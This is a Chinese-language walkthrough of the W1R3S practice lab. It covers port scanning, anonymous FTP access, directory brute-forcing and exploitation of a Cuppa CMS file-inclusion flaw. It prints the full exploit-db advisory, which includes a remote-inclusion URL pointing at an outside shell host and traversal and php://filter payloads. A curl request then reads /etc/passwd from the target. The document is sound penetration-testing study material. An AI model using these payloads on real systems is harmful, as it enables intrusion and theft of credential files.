W1R3S

主机发现

kali@kali:~$ sudo nmap -sn 192.168.19.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 11:20 EST
Nmap scan report for 192.168.19.1
Host is up (0.00015s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.19.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:FF:BF:31 (VMware)
Nmap scan report for 192.168.19.177
Host is up (0.0011s latency).
MAC Address: 00:0C:29:3C:F0:A4 (VMware)
Nmap scan report for 192.168.19.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:F4:EE:D1 (VMware)
Nmap scan report for 192.168.19.131
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 14.96 seconds

131是本机，所以177是我们目标机器

端口扫描

开放端口扫描

实际环境至少扫两遍，比对结果，然后分析

扫描主机开放了哪些端口

sudo nmap --min-rate 10000 -p- 192.168.19.177
这个是大佬综合效率，文档，权衡下选择的一条命令

kali@kali:~$ sudo nmap --min-rate 10000 -p- 192.168.19.177
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 11:21 EST
Nmap scan report for 192.168.19.177
Host is up (0.00038s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:3C:F0:A4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds
                                                               

对开放的端口进行深度扫描

TCP扫描，探测版本，服务，操作系统

sudo nmap -sT -sV -O -p21,22,80,3306 192.168.19.177

kali@kali:~$ sudo nmap -sT -sV -O -p21,22,80,3306 192.168.19.177
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 11:28 EST
Nmap scan report for 192.168.19.177
Host is up (0.00072s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:3C:F0:A4 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: ../images.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds

别忽略UDP扫描，没攻击向量的时候,UDP可能是一个出路

sudo nmap -sU -p21,22,80,3306 192.168.19.177

kali@kali:~$ sudo nmap -sU -p21,22,80,3306 192.168.19.177
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 11:32 EST
Nmap scan report for 192.168.19.177
Host is up (0.00046s latency).

PORT     STATE         SERVICE
21/udp   open|filtered ftp
22/udp   open|filtered ssh
80/udp   open|filtered http
3306/udp closed        mysql
MAC Address: 00:0C:29:3C:F0:A4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds

分析一下扫描的结果

21端口可能有匿名登录

22端口，实际有攻击面的概率不大，可以简单尝试，不建议死磕

80端口，一般是最大的攻击面，可能性很大，就算可能不是突破口，也可能暴露很多信息

3306，和80一样，可能性也不小

对于这几个端口，存在攻击面的可能，22可能性比较小，然后是3306，再然后是22，最可能的是80

打点顺序，因为21比较简单，ftp 一般来说都比较简单，他能看的事情就是我能不能匿名，然后我能不能找到账号，然后我进去之后是不是可写类似这样的操作。然后还有 FTP 也有一个目录横向移动，类似这些我们都经历过，所以这些我们一般先看21，然后看80这两个是关联到一起的。那根据我们后边的具体情况，如果21和80都不行，那我们就看3306。如果这三个都不行，那我们看22。

每一个攻击向量 womens 死磕到什么程度才是 OK 的。我一般来说就是如果20分钟到半小时这个不行，那我就切换另一个。为什么这样操作？因为如果每一项你要都死磕下去，会耗费你特别多的时间，而就算你死磕下去，你把它搞定了，但是你未必是最省时间的。所以你要迅速的去切换，这样去切换也有利于你换一下脑子，换一下思路。

nmap进行漏洞扫描

kali@kali:~$ sudo nmap --script=vuln -p21,22,80,3306 192.168.19.17

kali@kali:~$ sudo nmap --script=vuln -p21,22,80,3306 192.168.19.177
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 11:42 EST
Nmap scan report for 192.168.19.177
Host is up (0.00038s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:3C:F0:A4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 327.90 seconds

发现80有DOS攻击，存在wordpress，重点关注

21，22，3306没扫描出什么

打点

ftp匿名登录成功

匿名用户名anonymous密码为空

┌──(kali㉿kali)-[~/../images]
└─$ ftp 192.168.19.177
Connected to 192.168.19.177.
220 Welcome to ../images.inc FTP service.
Name (192.168.19.177:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

查看里面的文件，发现是可以执行的，但是不能写，所以利用不了

ftp> ls
229 Entering Extended Passive Mode (|||48758|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.

把里面的文件全部下载下来

ftp> ls
229 Entering Extended Passive Mode (|||48758|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45578|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt
-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt
-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt
226 Directory send OK.
ftp> mget 0*.txt
mget 01.txt [anpqy?]? 
229 Entering Extended Passive Mode (|||45638|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |****************************************************************************************************************************************************|    29      615.65 KiB/s    00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (47.59 KiB/s)
mget 02.txt [anpqy?]? 
229 Entering Extended Passive Mode (|||43476|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |****************************************************************************************************************************************************|   165        4.76 MiB/s    00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (347.26 KiB/s)
mget 03.txt [anpqy?]? 
229 Entering Extended Passive Mode (|||49717|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |****************************************************************************************************************************************************|   582        7.20 MiB/s    00:00 ETA
226 Transfer complete.
582 bytes received in 00:00 (209.72 KiB/s)
ftp> cd ../docs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49082|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt
226 Directory send OK.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
229 Entering Extended Passive Mode (|||42211|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |****************************************************************************************************************************************************|   138        2.99 MiB/s    00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (427.82 KiB/s)
ftp> cd ../new-employees
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42554|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt
226 Directory send OK.
ftp> get employee-names.txt
local: employee-names.txt remote: employee-names.txt
229 Entering Extended Passive Mode (|||49608|)
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
100% |****************************************************************************************************************************************************|   155       68.36 KiB/s    00:00 ETA
226 Transfer complete.
155 bytes received in 00:00 (58.46 KiB/s)
ftp> 

此处文件都是纯文本的，如果不是纯文本，是可执行文件，进到ftp后，输入binary后再下载，不执行直接下载会损坏

分析ftp下载的文件

01.txt

kali@kali:~/../images$ cat 01.txt
New FTP Server For ../images.inc

02.txt

kali@kali:~/../images$ cat 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################

第一段可能是md5,第二段字符可能是base64

看不出来可以用hash-identifier

kali@kali:~/../images$ hash-identifier 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=='
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.
--------------------------------------------------
 HASH: 01ec2d8fc11c493b25029fb1f47f39ce

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
---------

解密

SS

kali@kali:~/../images$  echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..

03.txt

employee-names.txt

暴露了一些信息

kali@kali:~/../images$ cat employee-names.txt
The ../images.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

worktodo.txt

初看好像是乱码，仔细一看就是上下左右或者顺序颠倒了

kali@kali:~/../images$ cat worktodo.txt
        ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

使用搜索引擎

ftp的信息基本看完了，好像没什么能利用的，但实际上，这个地方得到的信息已经非常多了

到这也花了有二三十分钟，换个攻击面。

80端口，web页面

一般来说，主页面没啥攻击面，但不代表没有

刚刚扫到了一个wordpress,说明在某个目录下可能跑了一个wordprss

目录爆破

可以使用gobuster，dirb，feroxbuster

这里用feroxbuster

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://192.168.19.177 -w /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.19.177
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        9l       28w      321c http://192.168.19.177/javascript => http://192.168.19.177/javascript/
301      GET        9l       28w      320c http://192.168.19.177/wordpress => http://192.168.19.177/wordpress/
200      GET      375l      968w    11321c http://192.168.19.177/
301      GET        9l       28w      324c http://192.168.19.177/administrator => http://192.168.19.177/administrator/
403      GET       11l       32w      302c http://192.168.19.177/server-status
301      GET        9l       28w      328c http://192.168.19.177/javascript/jquery => http://192.168.19.177/javascript/jquery/
200      GET    10351l    43235w   284394c http://192.168.19.177/javascript/jquery/jquery
301      GET        9l       28w      334c http://192.168.19.177/administrator/templates => http://192.168.19.177/administrator/templates/
301      GET        9l       28w      330c http://192.168.19.177/administrator/media => http://192.168.19.177/administrator/media/
301      GET        9l       28w      327c http://192.168.19.177/administrator/js => http://192.168.19.177/administrator/js/
301      GET        9l       28w      337c http://192.168.19.177/administrator/installation => http://192.168.19.177/administrator/installation/
301      GET        9l       28w      335c http://192.168.19.177/administrator/components => http://192.168.19.177/administrator/components/
301      GET        9l       28w      328c http://192.168.19.177/administrator/api => http://192.168.19.177/administrator/api/
301      GET        9l       28w      333c http://192.168.19.177/administrator/language => http://192.168.19.177/administrator/language/
301      GET        9l       28w      332c http://192.168.19.177/administrator/classes => http://192.168.19.177/administrator/classes/
301      GET        9l       28w      341c http://192.168.19.177/administrator/components/stats => http://192.168.19.177/administrator/components/stats/
301      GET        9l       28w      332c http://192.168.19.177/wordpress/wp-includes => http://192.168.19.177/wordpress/wp-includes/
301      GET        9l       28w      329c http://192.168.19.177/wordpress/wp-admin => http://192.168.19.177/wordpress/wp-admin/
301      GET        9l       28w      331c http://192.168.19.177/wordpress/wp-content => http://192.168.19.177/wordpress/wp-content/
301      GET        9l       28w      333c http://192.168.19.177/administrator/api/test => http://192.168.19.177/administrator/api/test/
301      GET        9l       28w      342c http://192.168.19.177/administrator/api/administrator => http://192.168.19.177/administrator/api/administrator/
301      GET        9l       28w      342c http://192.168.19.177/administrator/installation/html => http://192.168.19.177/administrator/installation/html/
301      GET        9l       28w      337c http://192.168.19.177/administrator/classes/ajax => http://192.168.19.177/administrator/classes/ajax/
301      GET        9l       28w      339c http://192.168.19.177/wordpress/wp-content/plugins => http://192.168.19.177/wordpress/wp-content/plugins/
301      GET        9l       28w      338c http://192.168.19.177/wordpress/wp-content/themes => http://192.168.19.177/wordpress/wp-content/themes/
301      GET        9l       28w      339c http://192.168.19.177/wordpress/wp-content/uploads => http://192.168.19.177/wordpress/wp-content/uploads/
301      GET        9l       28w      340c http://192.168.19.177/administrator/components/menu => http://192.168.19.177/administrator/components/menu/
301      GET        9l       28w      339c http://192.168.19.177/wordpress/wp-content/upgrade => http://192.168.19.177/wordpress/wp-content/upgrade/
301      GET        9l       28w      348c http://192.168.19.177/administrator/components/menu/classes => http://192.168.19.177/administrator/components/menu/classes/
301      GET        9l       28w      345c http://192.168.19.177/administrator/components/menu/html => http://192.168.19.177/administrator/components/menu/html/
301      GET        9l       28w      332c http://192.168.19.177/wordpress/wp-admin/js => http://192.168.19.177/wordpress/wp-admin/js/
301      GET        9l       28w      333c http://192.168.19.177/wordpress/wp-admin/css => http://192.168.19.177/wordpress/wp-admin/css/
301      GET        9l       28w      336c http://192.168.19.177/wordpress/wp-admin/images => http://192.168.19.177/wordpress/wp-admin/images/
301      GET        9l       28w      338c http://192.168.19.177/wordpress/wp-admin/includes => http://192.168.19.177/wordpress/wp-admin/includes/
301      GET        9l       28w      334c http://192.168.19.177/wordpress/wp-admin/user => http://192.168.19.177/wordpress/wp-admin/user/
[####################] - 37s   960000/960000  0s      found:35      errors:696069 
[####################] - 21s    30000/30000   1464/s  http://192.168.19.177 
[####################] - 20s    30000/30000   1514/s  http://192.168.19.177/javascript 
[####################] - 28s    30000/30000   1100/s  http://192.168.19.177/wordpress 
[####################] - 34s    30000/30000   942/s   http://192.168.19.177/ 
[####################] - 28s    30000/30000   1072/s  http://192.168.19.177/administrator 
[####################] - 13s    30000/30000   2373/s  http://192.168.19.177/javascript/jquery 
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/administrator/media => Directory listing (add -e to scan)
[####################] - 27s    30000/30000   1208/s  http://192.168.19.177/administrator/templates 
[####################] - 33s    30000/30000   898/s   http://192.168.19.177/administrator/js 
[####################] - 27s    30000/30000   1148/s  http://192.168.19.177/administrator/installation 
[####################] - 26s    30000/30000   1179/s  http://192.168.19.177/administrator/components 
[####################] - 26s    30000/30000   1151/s  http://192.168.19.177/administrator/api 
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/administrator/language => Directory listing (add -e to scan)
[####################] - 33s    30000/30000   899/s   http://192.168.19.177/administrator/classes 
[####################] - 33s    30000/30000   958/s   http://192.168.19.177/administrator/components/stats 
[####################] - 33s    30000/30000   901/s   http://192.168.19.177/wordpress/wp-includes 
[####################] - 26s    30000/30000   1154/s  http://192.168.19.177/wordpress/wp-admin 
[####################] - 26s    30000/30000   1242/s  http://192.168.19.177/wordpress/wp-content 
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/administrator/api/test => Directory listing (add -e to scan)
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/administrator/api/administrator => Directory listing (add -e to scan)
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/administrator/installation/html => Directory listing (add -e to scan)
[####################] - 33s    30000/30000   941/s   http://192.168.19.177/administrator/classes/ajax 
[####################] - 18s    30000/30000   1714/s  http://192.168.19.177/wordpress/wp-content/plugins 
[####################] - 26s    30000/30000   1178/s  http://192.168.19.177/wordpress/wp-content/themes 
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/wordpress/wp-content/uploads => Directory listing (add -e to scan)
[####################] - 28s    30000/30000   1154/s  http://192.168.19.177/administrator/components/menu 
[####################] - 0s     30000/30000   0/s     http://192.168.19.177/wordpress/wp-content/upgrade => Directory listing (add -e to scan)
[####################] - 32s    30000/30000   931/s   http://192.168.19.177/wordpress/wp-admin/js 
[####################] - 32s    30000/30000   945/s   http://192.168.19.177/wordpress/wp-admin/css 
[####################] - 27s    30000/30000   1140/s  http://192.168.19.177/wordpress/wp-admin/images 
[####################] - 25s    30000/30000   1244/s  http://192.168.19.177/wordpress/wp-admin/includes 
[####################] - 32s    30000/30000   1100/s  http://192.168.19.177/wordpress/wp-admin/user 

查看我们扫描到的目录

发现叫cuppa cms,是一个安装界面

点击next

发现这个了databases拼错了，这就是一个点，这个错误就可以成为这个系统的一个特征

我们试着重装一下

发现不行

可以尝试一下sql注入，发现不行，已经花了很多时间了，没必要死磕了，我们换个方式

利用kali寻找cuppa cms的漏洞

kali@kali:~/../images$ searchsploit cuppa cms                                                                                            
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                                                                | php/webapps/25971.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                 
kali@kali:~/../images$ searchsploit cuppa cms -m 25971
[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


  Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
    Codes: OSVDB-94101
 Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /home/kali/../images/25971.txt


                                                                                                                                                                                                 
kali@kali:~/../images$ ls
01.txt  02.txt  03.txt  25971.txt  employee-names.txt  worktodo.txt
                                                                                                                                                                                                 
kali@kali:~/../images$ cat 25971.txt   
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
        class Configuration{
                public $host = "localhost";
                public $db = "cuppa";
                public $user = "root";
                public $password = "Db@dmin";
                public $table_prefix = "cu_";
                public $administrator_template = "default";
                public $list_limit = 25;
                public $token = "OBqIPqlFWf3X";
                public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
                public $upload_default_path = "media/uploadsFiles";
                public $maximum_file_size = "5242880";
                public $secure_login = 0;
                public $secure_login_value = "";
                public $secure_login_redirect = "";
        }
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################               

这是一个文件包含漏洞。

给了exp

尝试访问，但是空白，没啥信息

只显示我们显示给我们一个类似对话框的这样一个 web 组件。这个可能是什么原因呢？那第一有可能就是这条路走不通，那中间还有一些细节，这些事情我们在试过之后可能就能最终确定，那能不能走通。我们现在试一下，我们回想。或者是回看一下我们这个利用文件，我们能看到这里边涉及到有一个编码问题对吧？

我们可以借助一些工具

这里在kali中使用curl

                                                                                        
kali@kali:~/../images$ sudo curl --data-urlencode urlConfig=./../../../../../../../../etc/passwd http://192.168.19.177/administrator/alerts/alertConfigField.php            
<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
        function CloseDefaultAlert(){
                cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
        }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
